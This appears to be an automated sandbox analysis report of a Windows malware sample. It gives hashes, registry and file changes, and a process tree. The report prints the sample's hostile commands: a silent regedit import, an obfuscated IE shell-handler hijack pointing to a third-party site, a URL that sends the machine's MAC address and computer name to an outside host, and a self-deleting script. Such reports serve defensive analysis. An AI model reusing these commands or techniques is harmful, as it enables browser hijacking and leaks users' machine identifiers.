Analysis
-
max time kernel
122s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 17:46
Behavioral task
behavioral1
Sample
c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
Resource
win7-20240705-en
General
-
Target
c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
-
Size
192KB
-
MD5
c94edec63a3c932df38e954b961b11f8
-
SHA1
f868c1d8ef4f9bd03857146f900a00262b8cbf9a
-
SHA256
599773f20bdf1fb9e692e82714c36355eadf345907bda66cadfcb8e25a0be902
-
SHA512
234ae37a9650889a80e4815025bca9978e000c984397420bd3cc2f6aa6c842bcd487e74721f3845562e7a2f9952bba9de0a75d32a85983d5cb3eeb494f1d9a0b
-
SSDEEP
3072:f0ENLX2tm4mjyIO+kIHrErlOBUY/PNAh:fMIO+NrsM
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 916 wscript.exe -
resource yara_rule behavioral1/memory/1856-0-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral1/memory/1856-23-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral1/memory/1856-36-0x0000000000400000-0x0000000000431000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files\Common Files\READ.TXT WScript.exe File created C:\Program Files\Common Files\tk.reg c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\fwnqdoerg.dqpaw c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe File created C:\Program Files\Common Files\1_fwnqdoerg.dqpaw c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe File created C:\Program Files\Common Files\2_fwnqdoerg.dqpaw c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\pack.wsf c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\fwnqdoerg.dqpaw Cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\My.ini c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A35D2CC1-662E-11EF-BF10-EE5017308107} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c005046f3bfada01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f8e41e3384fa749ac47329e409d990900000000020000000000106600000001000020000000dec8c511f22a85ef3cbc724b17af1fc2d96933853166ac86fd5a356b48931763000000000e80000000020000200000005a2b48bee5fd39c5d8f558cc699d6455ddf82a5dfcd017b2b611ff83ffa49617900000000cf8dfbd37c796b0c1df6a05fde4daf2d4de9f52e2d4fd4c9aaab419f112bb4d764481e0506e08622e629321987aa07feef000aa4814d3a2549df7be9d6dbb35253a4718785198aa35ebf950fc180e6c43302479c5678d84adff777d0235a0f5684a438edaf4c7b60f757b843a5049c6b5a1d6b424a25b4d1ac1fcc2518f768fdb67f97834a98d85719e85b2e552bcd540000000d5cb3b865a078547c62917940c5ad9e31b711fb94b796f8d1056b3e64a81766832f1bc341aaf2ee744ba38e130a0dcd9a539608bb0a4ce55213117056f110de0 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "431115464" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f8e41e3384fa749ac47329e409d9909000000000200000000001066000000010000200000000c072e9d7ec1c73a0704b116935a6bc2afc5a5188f1deb769d16d5b4f88e572a000000000e8000000002000020000000d71013d9e84461d46ea422a1d45208a134ab002a529b06a1ca549ecb7c664b1520000000c799f8774a86767ced7a282c1f22e537863b22027fbeaa8109f2da18235746154000000067605110ac0d333f4cc6787e6480dc06c3fc065450d6fac909ea444454ce8bf4182d64b5962b01aa14626c2761e3d8d4d8b832e5f18f6a39e1596881fda9ec2e iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O) WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers regedit.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O) regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "????" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1 h%t%t%p:%//%w%w%w.%15%18%1l%1a%1l%1a.%c%o%m/?bymf" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\FriendlyTypeName = "@%SystemRoot%\\System32\\wshext.dll,-4804" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptHostEncode\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command\ = "WScript.exe \"C:\\Program Files\\Common Files\\fwnqdoerg.dqpaw\" \"%1\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\ = "????" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\ = "open" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.qc WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon WScript.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Print\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe /p %1" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\ = "open" WScript.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 regedit.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\ WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\ = "????" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers WScript.exe -
Runs .reg file with regedit 1 IoCs
pid Process 2188 regedit.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3032 iexplore.exe 3032 iexplore.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 3032 iexplore.exe 3032 iexplore.exe 2928 IEXPLORE.EXE 2928 IEXPLORE.EXE 3032 iexplore.exe 3032 iexplore.exe 1036 IEXPLORE.EXE 1036 IEXPLORE.EXE 1036 IEXPLORE.EXE 1036 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1856 wrote to memory of 3016 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 30 PID 1856 wrote to memory of 3016 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 30 PID 1856 wrote to memory of 3016 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 30 PID 1856 wrote to memory of 3016 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 30 PID 3016 wrote to memory of 2188 3016 cmd.exe 32 PID 3016 wrote to memory of 2188 3016 cmd.exe 32 PID 3016 wrote to memory of 2188 3016 cmd.exe 32 PID 3016 wrote to memory of 2188 3016 cmd.exe 32 PID 1856 wrote to memory of 2768 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 35 PID 1856 wrote to memory of 2768 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 35 PID 1856 wrote to memory of 2768 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 35 PID 1856 wrote to memory of 2768 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 35 PID 2768 wrote to memory of 2252 2768 Cmd.exe 37 PID 2768 wrote to memory of 2252 2768 Cmd.exe 37 PID 2768 wrote to memory of 2252 2768 Cmd.exe 37 PID 2768 wrote to memory of 2252 2768 Cmd.exe 37 PID 1856 wrote to memory of 2640 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 38 PID 1856 wrote to memory of 2640 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 38 PID 1856 wrote to memory of 2640 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 38 PID 1856 wrote to memory of 2640 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 38 PID 2640 wrote to memory of 3032 2640 WScript.exe 39 PID 2640 wrote to memory of 3032 2640 WScript.exe 39 PID 2640 wrote to memory of 3032 2640 WScript.exe 39 PID 2640 wrote to memory of 3032 2640 WScript.exe 39 PID 3032 wrote to memory of 2928 3032 iexplore.exe 41 PID 3032 wrote to memory of 2928 3032 iexplore.exe 41 PID 3032 wrote to memory of 2928 3032 iexplore.exe 41 PID 3032 wrote to memory of 2928 3032 iexplore.exe 41 PID 1856 wrote to memory of 2228 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 45 PID 1856 wrote to memory of 2228 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 45 PID 1856 wrote to memory of 2228 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 45 PID 1856 wrote to memory of 2228 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 45 PID 3032 wrote to memory of 1036 3032 iexplore.exe 47 PID 3032 wrote to memory of 1036 3032 iexplore.exe 47 PID 3032 wrote to memory of 1036 3032 iexplore.exe 47 PID 3032 wrote to memory of 1036 3032 iexplore.exe 47 PID 1856 wrote to memory of 916 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 46 PID 1856 wrote to memory of 916 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 46 PID 1856 wrote to memory of 916 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 46 PID 1856 wrote to memory of 916 1856 c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Common Files\tk.reg"3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Runs .reg file with regedit
PID:2188
-
-
-
C:\Windows\SysWOW64\Cmd.exeCmd.exe /c CScript /nologo "C:\Program Files\Common Files\pack.wsf" "C:\Program Files\Common Files\1_fwnqdoerg.dqpaw" >> "C:\Program Files\Common Files\fwnqdoerg.dqpaw"2⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\cscript.exeCScript /nologo "C:\Program Files\Common Files\pack.wsf" "C:\Program Files\Common Files\1_fwnqdoerg.dqpaw"3⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
C:\Windows\SysWow64\WScript.exe"C:\Windows\SysWow64\WScript.exe" "C:\Program Files\Common Files\fwnqdoerg.dqpaw"2⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.58lala.com/?bymf3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3032 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2928
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3032 CREDAT:3421196 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1036
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=EE:50:17:30:81:07&a_cpname=PSBQWFYT&a_user=bymf&a_locip=0.0.0.02⤵PID:2228
-
-
\??\c:\windows\SysWOW64\wscript.exec:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:916
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
51KB
MD5656c0b3a84eeee7d6fc30c0344a7d67b
SHA19c315d101b30b8174f71449a45db1834e2f230fb
SHA256b7a87e7ebc673a1f2c6562355d5c0418dc758e888d81a9c10a9097e7285ccc2e
SHA512463db19fac5099efb17585487b80ecae8d382fd75886c77f55d513849ea8daf39fd496319d5d2b8e5cae8e9889768c7e634ea66d363e9db66ff18ec0f60a42c7
-
Filesize
40KB
MD5588c92a8a6c65a19e628d72ee7d37411
SHA190063578ca37e9c89be8c7caab30a58a67b89fe9
SHA256efb5af3687ed93136c49d27c53a18c475ff9dee849d9b92836c073b3bb088022
SHA512b041a59988d9901a50e1da72b9d5186db6432ff74ef1d0148861ce5d062c2ccd59fe8ad7c9496174d7f3986c24c4ed1f656a56afd4daa8cdb453e328e80f81ac
-
Filesize
8KB
MD5a83fdf4f29a7e978d33eeb3674df531b
SHA160ea7b41816bc2044a6224e38352e56667d3d5ed
SHA256f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845
SHA5127ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0
-
Filesize
4KB
MD528a4d933f2281a2438e828033710b4a8
SHA1e3cdffd1c2d2744aa2426ffa1a875a5b96fc82f8
SHA2567e12d0b4535853192c076a34dcd84e5c9e9b773e0ed5c91260b9c96a61330064
SHA51296bebd13a7a2aae2540a1958936a0008b0e39e2d9ca287612c20849416d2e4558a2d9a8f360ef2c31512e96d1da607d4a7cebbb92d6c75d96906ae14a9b03e00
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f269423c51b56f51fb73024d061f0581
SHA1c562b894db994f381d5f3d08ce0d5d72c81fa992
SHA256b814183bc0095851aba9c76892687cac7b6094579f73ee7c31450799cd9bd912
SHA51283dbcb28c621db9864ab0edadcfef14023ad55b2063328b104fc80090810f246f71aacbfaeaad7fa6828d31488977234c706ccc1235ffd3b9886f7ddaa9ec91b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD578e1fa7945a6e3f465b43e98cf66c1da
SHA1669dd9c85da906ee80f8a6cc172089ca014b7415
SHA25662f2896c4de8aad2cbef96eeb7395d879c2e61d149b9a11924b0a64310ff7eb0
SHA51224dbf253d8f719b5e65f33a0293a3d75c2004f9dc4f11155c5a7bac9233c2cffbfd3bfbfe7e591fd824d796015309ff8d2eac959666e5bc44d592a3be1b8ec61
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5848d9d6e95079d02490219bb2a3309a1
SHA10723edfd284b1b8175c1912bc9dba71b83385af7
SHA256c588a4fc9a6392a53a91a6877aee13a04a3f8ca2f3a79352168de2432a90d274
